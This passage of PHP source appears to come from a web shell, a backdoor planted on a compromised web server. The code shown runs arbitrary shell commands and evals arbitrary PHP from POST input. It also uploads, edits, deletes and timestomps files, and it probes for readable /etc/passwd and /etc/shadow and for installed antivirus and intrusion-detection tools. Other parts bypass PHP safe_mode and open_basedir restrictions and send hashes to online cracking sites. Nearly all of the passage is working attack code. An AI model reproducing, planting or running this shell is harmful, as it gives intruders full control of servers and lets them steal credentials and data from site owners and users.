 288         <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'> 
 289         <span>Upload file:</span><br><input class="toolsInp" type=file name=f><input type=submit value=">>"></form><?=$is_writable?></td> 
 290     </tr> 
 291 
 292 </table> 
 293 </div> 
 294 </body></html> 
 295 <?php 
 296 } 
 297 if ( !function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false) ) { function posix_getpwuid($p) { return false; } }
 298 if ( !function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false) ) { function posix_getgrgid($p) { return false; } }
 299 function ex($in) { 
 300     $out = ''; 
 301     if(function_exists('exec')) { 
 302         @exec($in,$out); 
 303         $out = @join("\n",$out); 
 304     }elseif(function_exists('passthru')) { 
 305         ob_start(); 
 306         @passthru($in); 
 307         $out = ob_get_clean(); 
 308     }elseif(function_exists('system')) { 
 309         ob_start(); 
 310         @system($in); 
 311         $out = ob_get_clean(); 
 312     }elseif(function_exists('shell_exec')) { 
 313         $out = shell_exec($in); 
 314     }elseif(is_resource($f = @popen($in,"r"))) { 
 315         $out = ""; 
 316         while(!@feof($f)) 
 317             $out .= fread($f,1024); 
 318         pclose($f); 
 319     } 
 320     return $out; 
 321 } 
 322 function viewSize($s) { 
 323     if($s >= 1073741824) 
 324         return sprintf('%1.2f', $s / 1073741824 ). ' GB'; 
 325     elseif($s >= 1048576) 
 326         return sprintf('%1.2f', $s / 1048576 ) . ' MB'; 
 327     elseif($s >= 1024) 
 328         return sprintf('%1.2f', $s / 1024 ) . ' KB'; 
 329     else 
 330         return $s . ' B'; 
 331 } 
 332 
 333 function perms($p) { 
 334     if (($p & 0xC000) == 0xC000)$i = 's'; 
 335     elseif (($p & 0xA000) == 0xA000)$i = 'l'; 
 336     elseif (($p & 0x8000) == 0x8000)$i = '-'; 
 337     elseif (($p & 0x6000) == 0x6000)$i = 'b'; 
 338     elseif (($p & 0x4000) == 0x4000)$i = 'd'; 
 339     elseif (($p & 0x2000) == 0x2000)$i = 'c'; 
 340     elseif (($p & 0x1000) == 0x1000)$i = 'p'; 
 341     else $i = 'u'; 
 342     $i .= (($p & 0x0100) ? 'r' : '-'); 
 343     $i .= (($p & 0x0080) ? 'w' : '-'); 
 344     $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-')); 
 345     $i .= (($p & 0x0020) ? 'r' : '-'); 
 346     $i .= (($p & 0x0010) ? 'w' : '-'); 
 347     $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-')); 
 348     $i .= (($p & 0x0004) ? 'r' : '-'); 
 349     $i .= (($p & 0x0002) ? 'w' : '-'); 
 350     $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-')); 
 351     return $i; 
 352 } 
 353 function viewPermsColor($f) {  
 354     if (!@is_readable($f)) 
 355         return '<font color=#FF0000><b>'.perms(@fileperms($f)).'</b></font>'; 
 356     elseif (!@is_writable($f)) 
 357         return '<font color=white><b>'.perms(@fileperms($f)).'</b></font>'; 
 358     else 
 359         return '<font color=#00BB00><b>'.perms(@fileperms($f)).'</b></font>'; 
 360 } 
 361 if(!function_exists("scandir")) { 
 362     function scandir($dir) { 
 363         $dh  = opendir($dir); 
 364         while (false !== ($filename = readdir($dh))) { 
 365             $files[] = $filename; 
 366         } 
 367         return $files; 
 368     } 
 369 } 
 370 function which($p) { 
 371     $path = ex('which '.$p); 
 372     if(!empty($path)) 
 373         return $path; 
 374     return false; 
 375 } 
 376 function actionSecInfo() { 
 377     printHeader(); 
 378     echo '<h1>Server security information</h1><div class=content>'; 
 379     function showSecParam($n, $v) { 
 380         $v = trim($v); 
 381         if($v) { 
 382             echo '<span>'.$n.': </span>'; 
 383             if(strpos($v, "\n") === false) 
 384                 echo $v.'<br>'; 
 385             else 
 386                 echo '<pre class=ml1>'.$v.'</pre>'; 
 387         } 
 388     } 
 389      
 390     showSecParam('Server software', @getenv('SERVER_SOFTWARE')); 
 391     showSecParam('Disabled PHP Functions', ($GLOBALS['disable_functions'])?$GLOBALS['disable_functions']:'none'); 
 392     showSecParam('Open base dir', @ini_get('open_basedir')); 
 393     showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir')); 
 394     showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir')); 
 395     showSecParam('cURL support', function_exists('curl_version')?'enabled':'no'); 
 396     $temp=array(); 
 397     if(function_exists('mysql_get_client_info')) 
 398         $temp[] = "MySql (".mysql_get_client_info().")"; 
 399     if(function_exists('mssql_connect')) 
 400         $temp[] = "MSSQL"; 
 401     if(function_exists('pg_connect')) 
 402         $temp[] = "PostgreSQL"; 
 403     if(function_exists('oci_connect')) 
 404         $temp[] = "Oracle"; 
 405     showSecParam('Supported databases', implode(', ', $temp)); 
 406     echo '<br>'; 
 407      
 408     if( $GLOBALS['os'] == 'nix' ) { 
 409         $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); 
 410         $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja'); 
 411         $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); 
 412         showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no'); 
 413         showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"etc\", \"shadow\")'>[view]</a>":'no'); 
 414         showSecParam('OS version', @file_get_contents('/proc/version')); 
 415         showSecParam('Distr name', @file_get_contents('/etc/issue.net')); 
 416         if(!$GLOBALS['safe_mode']) { 
 417             echo '<br>'; 
 418             $temp=array(); 
 419             foreach ($userful as $item) 
 420                 if(which($item)){$temp[]=$item;} 
 421             showSecParam('Userful', implode(', ',$temp)); 
 422             $temp=array(); 
 423             foreach ($danger as $item) 
 424                 if(which($item)){$temp[]=$item;} 
 425             showSecParam('Danger', implode(', ',$temp)); 
 426             $temp=array(); 
 427             foreach ($downloaders as $item)  
 428                 if(which($item)){$temp[]=$item;} 
 429             showSecParam('Downloaders', implode(', ',$temp)); 
 430             echo '<br/>'; 
 431             showSecParam('Hosts', @file_get_contents('/etc/hosts')); 
 432             showSecParam('HDD space', ex('df -h')); 
 433             showSecParam('Mount options', @file_get_contents('/etc/fstab')); 
 434         } 
 435     } else { 
 436         showSecParam('OS Version',ex('ver'));  
 437         showSecParam('Account Settings',ex('net accounts'));  
 438         showSecParam('User Accounts',ex('net user')); 
 439     } 
 440     echo '</div>'; 
 441     printFooter(); 
 442 } 
 443 
 444 function actionPhp() { 
 445     if( isset($_POST['ajax']) ) { 
 446         $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true; 
 447         ob_start(); 
 448         eval($_POST['p1']); 
 449         $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'&#92;&#48;")."';\n"; 
 450         echo strlen($temp), "\n", $temp; 
 451         exit;  
 452     } 
 453     printHeader(); 
 454     if( isset($_POST['p2']) && ($_POST['p2'] == 'info') ) { 
 455         echo '<h1>PHP info</h1><div class=content>'; 
 456         ob_start(); 
 457         phpinfo(); 
 458         $tmp = ob_get_clean(); 
 459         $tmp = preg_replace('!body {.*}!msiU','',$tmp); 
 460         $tmp = preg_replace('!a:\w+ {.*}!msiU','',$tmp); 
 461         $tmp = preg_replace('!h1!msiU','h2',$tmp); 
 462         $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp); 
 463         $tmp = preg_replace('!body, td, th, h2, h2 {.*}!msiU','',$tmp); 
 464         echo $tmp; 
 465         echo '</div><br>'; 
 466     } 
 467     if(empty($_POST['ajax'])&&!empty($_POST['p1'])) 
 468         $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false; 
 469         echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);}else{g(null,null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">'; 
 470     echo ' <input type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>'; 
 471     if(!empty($_POST['p1'])) { 
 472         ob_start(); 
 473         eval($_POST['p1']); 
 474         echo htmlspecialchars(ob_get_clean()); 
 475     } 
 476     echo '</pre></div>'; 
 477     printFooter(); 
 478 } 
 479 
 480 function actionFilesMan() { 
 481     printHeader(); 
 482     echo '<h1>File manager</h1><div class=content>'; 
 483     if(isset($_POST['p1'])) { 
 484         switch($_POST['p1']) { 
 485             case 'uploadFile': 
 486                 if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name'])) 
 487                     echo "Can't upload file!"; 
 488                 break; 
 489                 break; 
 490             case 'mkdir': 
 491                 if(!@mkdir($_POST['p2'])) 
 492                     echo "Can't create new dir"; 
 493                 break; 
 494             case 'delete': 
 495                 function deleteDir($path) { 
 496                     $path = (substr($path,-1)=='/') ? $path:$path.'/'; 
 497                     $dh  = opendir($path); 
 498                     while ( ($item = readdir($dh) ) !== false) { 
 499                         $item = $path.$item; 
 500                         if ( (basename($item) == "..") || (basename($item) == ".") ) 
 501                             continue; 
 502                         $type = filetype($item); 
 503                         if ($type == "dir") 
 504                             deleteDir($item); 
 505                         else 
 506                             @unlink($item); 
 507                     } 
 508                     closedir($dh); 
 509                     rmdir($path); 
 510                 } 
 511                 if(is_array(@$_POST['f'])) 
 512                     foreach($_POST['f'] as $f) { 
 513                         $f = urldecode($f); 
 514                         if(is_dir($f)) 
 515                             deleteDir($f); 
 516                         else 
 517                             @unlink($f); 
 518                     } 
 519                 break; 
 520             case 'paste': 
 521                 if($_SESSION['act'] == 'copy') { 
 522                     function copy_paste($c,$s,$d){ 
 523                         if(is_dir($c.$s)){ 
 524                             mkdir($d.$s); 
 525                             $h = opendir($c.$s); 
 526                             while (($f = readdir($h)) !== false) 
 527                                 if (($f != ".") and ($f != "..")) { 
 528                                     copy_paste($c.$s.'/',$f, $d.$s.'/'); 
 529                                 } 
 530                         } elseif(is_file($c.$s)) { 
 531                             @copy($c.$s, $d.$s); 
 532                         } 
 533                     } 
 534                     foreach($_SESSION['f'] as $f) 
 535                         copy_paste($_SESSION['cwd'],$f, $GLOBALS['cwd']);                     
 536                 } elseif($_SESSION['act'] == 'move') { 
 537                     function move_paste($c,$s,$d){ 
 538                         if(is_dir($c.$s)){ 
 539                             mkdir($d.$s); 
 540                             $h = opendir($c.$s); 
 541                             while (($f = readdir($h)) !== false) 
 542                                 if (($f != ".") and ($f != "..")) { 
 543                                     copy_paste($c.$s.'/',$f, $d.$s.'/'); 
 544                                 } 
 545                         } elseif(is_file($c.$s)) { 
 546                             @copy($c.$s, $d.$s); 
 547                         } 
 548                     } 
 549                     foreach($_SESSION['f'] as $f) 
 550                         @rename($_SESSION['cwd'].$f, $GLOBALS['cwd'].$f); 
 551                 } 
 552                 unset($_SESSION['f']); 
 553                 break; 
 554             default: 
 555                 if(!empty($_POST['p1']) && (($_POST['p1'] == 'copy')||($_POST['p1'] == 'move')) ) { 
 556                     $_SESSION['act'] = @$_POST['p1']; 
 557                     $_SESSION['f'] = @$_POST['f']; 
 558                     foreach($_SESSION['f'] as $k => $f) 
 559                         $_SESSION['f'][$k] = urldecode($f); 
 560                     $_SESSION['cwd'] = @$_POST['c']; 
 561                 } 
 562                 break; 
 563         } 
 564         echo '<script>document.mf.p1.value="";document.mf.p2.value="";</script>'; 
 565     } 
 566     $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']); 
 567     if($dirContent === false) {    echo 'Can\'t open this folder!'; return;    }
 568     global $sort; 
 569     $sort = array('name', 1); 
 570     if(!empty($_POST['p1'])) { 
 571         if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match)) 
 572             $sort = array($match[1], (int)$match[2]); 
 573     } 
 574 ?> 
 575 <script> 
 576     function sa() { 
 577         for(i=0;i<document.files.elements.length;i++) 
 578             if(document.files.elements[i].type == 'checkbox') 
 579                 document.files.elements[i].checked = document.files.elements[0].checked; 
 580     } 
 581 </script> 
 582 <table width='100%' class='main' cellspacing='0' cellpadding='2'> 
 583 <form name=files method=post> 
 584 <?php 
 585     echo "<tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>"; 
 586     $dirs = $files = $links = array(); 
 587     $n = count($dirContent); 
 588     for($i=0;$i<$n;$i++) { 
 589         $ow = @posix_getpwuid(@fileowner($dirContent[$i])); 
 590         $gr = @posix_getgrgid(@filegroup($dirContent[$i])); 
 591         $tmp = array('name' => $dirContent[$i], 
 592                      'path' => $GLOBALS['cwd'].$dirContent[$i], 
 593                      'modify' => date('Y-m-d H:i:s',@filemtime($GLOBALS['cwd'].$dirContent[$i])), 
 594                      'perms' => viewPermsColor($GLOBALS['cwd'].$dirContent[$i]),
 595                      'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]), 
 596                      'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]), 
 597                      'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i]) 
 598                     ); 
 599         if(@is_file($GLOBALS['cwd'].$dirContent[$i])) 
 600             $files[] = array_merge($tmp, array('type' => 'file')); 
 601         elseif(@is_link($GLOBALS['cwd'].$dirContent[$i])) 
 602             $links[] = array_merge($tmp, array('type' => 'link')); 
 603         elseif(@is_dir($GLOBALS['cwd'].$dirContent[$i])&& ($dirContent[$i] != ".")) 
 604             $dirs[] = array_merge($tmp, array('type' => 'dir')); 
 605     } 
 606     $GLOBALS['sort'] = $sort; 
 607     function cmp($a, $b) { 
 608         if($GLOBALS['sort'][0] != 'size') 
 609             return strcmp($a[$GLOBALS['sort'][0]], $b[$GLOBALS['sort'][0]])*($GLOBALS['sort'][1]?1:-1); 
 610         else 
 611             return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1); 
 612     } 
 613     usort($files, "cmp"); 
 614     usort($dirs, "cmp"); 
 615     usort($links, "cmp"); 
 616     $files = array_merge($dirs, $links, $files); 
 617     $l = 0; 
 618     foreach($files as $f) { 
 619         echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');"><b>[ '.htmlspecialchars($f['name']).' ]</b>').'</a></td><td>'.(($f['type']=='file')?viewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms'] 
 620             .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>'; 
 621         $l = $l?0:1; 
 622     } 
 623     ?> 
 624     <tr><td colspan=7> 
 625     <input type=hidden name=a value='FilesMan'> 
 626     <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'> 
 627     <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'> 
 628     <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option><?php if(!empty($_SESSION['act'])&&@count($_SESSION['f'])){?><option value='paste'>Paste</option><?php }?></select>&nbsp;<input type="submit" value=">>"></td></tr> 
 629     </form></table></div> 
 630     <?php 
 631     printFooter(); 
 632 } 
 633 
 634 function actionStringTools() { 
 635     if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}} 
 636     if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}} 
 637     if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= dechex(ord($p[$i]));return strtoupper($r);}} 
 638     if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}} 
 639      
 640     if(isset($_POST['ajax'])) { 
 641         $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true; 
 642         ob_start(); 
 643         if(function_exists($_POST['p1'])) 
 644             echo $_POST['p1']($_POST['p2']); 
 645         $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'&#92;&#48;")."';\n"; 
 646         echo strlen($temp), "\n", $temp; 
 647         exit; 
 648     } 
 649     printHeader(); 
 650     echo '<h1>String conversions</h1><div class=content>'; 
 651     $stringTools = array( 
 652         'Base64 encode' => 'base64_encode', 
 653         'Base64 decode' => 'base64_decode', 
 654         'Url encode' => 'urlencode', 
 655         'Url decode' => 'urldecode', 
 656         'Full urlencode' => 'full_urlencode', 
 657         'md5 hash' => 'md5', 
 658         'sha1 hash' => 'sha1', 
 659         'crypt' => 'crypt', 
 660         'CRC32' => 'crc32', 
 661         'ASCII to HEX' => 'ascii2hex', 
 662         'HEX to ASCII' => 'hex2ascii', 
 663         'HEX to DEC' => 'hexdec', 
 664         'HEX to BIN' => 'hex2bin', 
 665         'DEC to HEX' => 'dechex', 
 666         'DEC to BIN' => 'decbin', 
 667         'BIN to HEX' => 'bin2hex', 
 668         'BIN to DEC' => 'bindec',         
 669         'String to lower case' => 'strtolower', 
 670         'String to upper case' => 'strtoupper', 
 671         'Htmlspecialchars' => 'htmlspecialchars', 
 672         'String length' => 'strlen', 
 673     ); 
 674     if(empty($_POST['ajax'])&&!empty($_POST['p1'])) 
 675         $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false; 
 676     echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>"; 
 677     foreach($stringTools as $k => $v) 
 678         echo "<option value='".htmlspecialchars($v)."'>".$k."</option>"; 
 679         echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ".($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".htmlspecialchars(@$_POST['p2'])."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>"; 
 680     if(!empty($_POST['p1'])) { 
 681         if(function_exists($_POST['p1'])) 
 682         echo htmlspecialchars($_POST['p1']($_POST['p2'])); 
 683     } 
 684     echo"</pre></div>"; 
 685     ?> 
 686     <br><h1>Search for hash:</h1><div class=content> 
 687         <form method='post' target='_blank' name="hf"> 
 688             <input type="text" name="hash" style="width:200px;"><br> 
 689             <input type="button" value="hashcrack.com" onclick="document.hf.action='http://www.hashcrack.com/index.php';document.hf.submit()"><br> 
 690             <input type="button" value="milw0rm.com" onclick="document.hf.action='http://www.milw0rm.com/cracker/search.php';document.hf.submit()"><br> 
 691             <input type="button" value="hashcracking.info" onclick="document.hf.action='https://hashcracking.info/index.php';document.hf.submit()"><br> 
 692             <input type="button" value="md5.rednoize.com" onclick="document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()"><br> 
 693             <input type="button" value="md5decrypter.com" onclick="document.hf.action='http://www.md5decrypter.com/';document.hf.submit()"><br> 
 694         </form> 
 695     </div> 
 696     <?php 
 697     printFooter(); 
 698 } 
 699 
 700 function actionFilesTools() { 
 701     if( isset($_POST['p1']) ) 
 702         $_POST['p1'] = urldecode($_POST['p1']); 
 703     if(@$_POST['p2']=='download') { 
 704         if(is_file($_POST['p1']) && is_readable($_POST['p1'])) { 
 705             ob_start("ob_gzhandler", 4096); 
 706             header("Content-Disposition: attachment; filename=".basename($_POST['p1'])); 
 707             if (function_exists("mime_content_type")) { 
 708                 $type = @mime_content_type($_POST['p1']); 
 709                 header("Content-Type: ".$type); 
 710             } 
 711             $fp = @fopen($_POST['p1'], "r"); 
 712             if($fp) { 
 713                 while(!@feof($fp)) 
 714                     echo @fread($fp, 1024); 
 715                 fclose($fp); 
 716             } 
 717         } elseif(is_dir($_POST['p1']) && is_readable($_POST['p1'])) { 
 718 
 719         } 
 720         exit; 
 721     } 
 722     if( @$_POST['p2'] == 'mkfile' ) { 
 723         if(!file_exists($_POST['p1'])) { 
 724             $fp = @fopen($_POST['p1'], 'w'); 
 725             if($fp) { 
 726                 $_POST['p2'] = "edit"; 
 727                 fclose($fp); 
 728             } 
 729         } 
 730     } 
 731     printHeader(); 
 732     echo '<h1>File tools</h1><div class=content>'; 
 733     if( !file_exists(@$_POST['p1']) ) { 
 734         echo 'File not exists'; 
 735         printFooter(); 
 736         return; 
 737     } 
 738     $uid = @posix_getpwuid(@fileowner($_POST['p1'])); 
 739     $gid = @posix_getgrgid(@fileowner($_POST['p1'])); 
 740     echo '<span>Name:</span> '.htmlspecialchars($_POST['p1']).' <span>Size:</span> '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.viewPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>'; 
 741     echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>'; 
 742     if( empty($_POST['p2']) ) 
 743         $_POST['p2'] = 'view'; 
 744     if( is_file($_POST['p1']) ) 
 745         $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch'); 
 746     else 
 747         $m = array('Chmod', 'Rename', 'Touch'); 
 748     foreach($m as $v) 
 749         echo '<a href=# onclick="g(null,null,null,\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> '; 
 750     echo '<br><br>'; 
 751     switch($_POST['p2']) { 
 752         case 'view': 
 753             echo '<pre class=ml1>'; 
 754             $fp = @fopen($_POST['p1'], 'r'); 
 755             if($fp) { 
 756                 while( !@feof($fp) ) 
 757                     echo htmlspecialchars(@fread($fp, 1024)); 
 758                 @fclose($fp); 
 759             } 
 760             echo '</pre>'; 
 761             break; 
 762         case 'highlight': 
 763             if( is_readable($_POST['p1']) ) { 
 764                 echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">'; 
 765                 $code = highlight_file($_POST['p1'],true); 
 766                 echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>'; 
 767             } 
 768             break; 
 769         case 'chmod': 
 770             if( !empty($_POST['p3']) ) { 
 771                 $perms = 0; 
 772                 for($i=strlen($_POST['p3'])-1;$i>=0;--$i) 
 773                     $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1)); 
 774                 if(!@chmod($_POST['p1'], $perms)) 
 775                     echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>'; 
 776                 else 
 777                     die('<script>g(null,null,null,null,"")</script>'); 
 778             } 
 779             echo '<form onsubmit="g(null,null,null,null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>'; 
 780             break; 
 781         case 'edit': 
 782             if( !is_writable($_POST['p1'])) { 
 783                 echo 'File isn\'t writeable'; 
 784                 break; 
 785             } 
 786             if( !empty($_POST['p3']) ) { 
 787                 @file_put_contents($_POST['p1'],$_POST['p3']); 
 788                 echo 'Saved!<br><script>document.mf.p3.value="";</script>'; 
 789             } 
 790             echo '<form onsubmit="g(null,null,null,null,this.text.value);return false;"><textarea name=text class=bigarea>'; 
 791             $fp = @fopen($_POST['p1'], 'r'); 
 792             if($fp) { 
 793                 while( !@feof($fp) ) 
 794                     echo htmlspecialchars(@fread($fp, 1024)); 
 795                 @fclose($fp); 
 796             } 
 797             echo '</textarea><input type=submit value=">>"></form>'; 
 798             break; 
 799         case 'hexdump': 
 800             $c = @file_get_contents($_POST['p1']); 
 801             $n = 0; 
 802             $h = array('00000000<br>','',''); 
 803             $len = strlen($c); 
 804             for ($i=0; $i<$len; ++$i) { 
 805                 $h[1] .= sprintf('%02X',ord($c[$i])).' '; 
 806                 switch ( ord($c[$i]) ) { 
 807                     case 0:  $h[2] .= ' '; break; 
 808                     case 9:  $h[2] .= ' '; break; 
 809                     case 10: $h[2] .= ' '; break; 
 810                     case 13: $h[2] .= ' '; break; 
 811                     default: $h[2] .= $c[$i]; break; 
 812                 } 
 813                 $n++; 
 814                 if ($n == 32) { 
 815                     $n = 0; 
 816                     if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';} 
 817                     $h[1] .= '<br>'; 
 818                     $h[2] .= "\n"; 
 819                 } 
 820              } 
 821             echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>'; 
 822             break; 
 823         case 'rename': 
 824             if( !empty($_POST['p3']) ) { 
 825                 if(!@rename($_POST['p1'], $_POST['p3'])) 
 826                     echo 'Can\'t rename!<br><script>document.mf.p3.value="";</script>'; 
 827                 else 
 828                     die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>'); 
 829             } 
 830             echo '<form onsubmit="g(null,null,null,null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>'; 
 831             break; 
 832         case 'touch': 
 833             if( !empty($_POST['p3']) ) { 
 834                 $time = strtotime($_POST['p3']); 
 835                 if($time) { 
 836                     if(@touch($_POST['p1'],$time,$time)) 
 837                         die('<script>g(null,null,null,null,"")</script>'); 
 838                     else { 
 839                         echo 'Fail!<script>document.mf.p3.value="";</script>'; 
 840                     } 
 841                 } else echo 'Bad time format!<script>document.mf.p3.value="";</script>'; 
 842             } 
 843             echo '<form onsubmit="g(null,null,null,null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>'; 
 844             break; 
 845         case 'mkfile': 
 846              
 847             break; 
 848     } 
 849     echo '</div>'; 
 850     printFooter(); 
 851 } 
 852 
 853 function actionSafeMode() { 
 854     $temp=''; 
 855     ob_start(); 
 856     switch($_POST['p1']) { 
 857         case 1: 
 858             $temp=@tempnam($test, 'cx'); 
 859             if(@copy("compress.zlib://".$_POST['p2'], $temp)){ 
 860                 echo @file_get_contents($temp); 
 861                 unlink($temp); 
 862             } else 
 863                 echo 'Sorry... Can\'t open file'; 
 864             break; 
 865         case 2: 
 866             $files = glob($_POST['p2'].'*'); 
 867             if( is_array($files) ) 
 868                 foreach ($files as $filename) 
 869                     echo $filename."\n"; 
 870             break; 
 871         case 3: 
 872             $ch = curl_init("file://".$_POST['p2']."\x00".SELF_PATH); 
 873             curl_exec($ch); 
 874             break; 
 875         case 4: 
 876             ini_restore("safe_mode"); 
 877             ini_restore("open_basedir"); 
 878             include($_POST['p2']); 
 879             break; 
 880         case 5: 
 881             for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) { 
 882                 $uid = @posix_getpwuid($_POST['p2']); 
 883                 if ($uid) 
 884                     echo join(':',$uid)."\n"; 
 885             } 
 886             break; 
 887         case 6: 
 888             if(!function_exists('imap_open'))break; 
 889             $stream = imap_open($_POST['p2'], "", ""); 
 890             if ($stream == FALSE) 
 891                 break; 
 892             echo imap_body($stream, 1); 
 893             imap_close($stream); 
 894             break; 
 895     } 
 896     $temp = ob_get_clean(); 
 897     printHeader(); 
 898     echo '<h1>Safe mode bypass</h1><div class=content>'; 
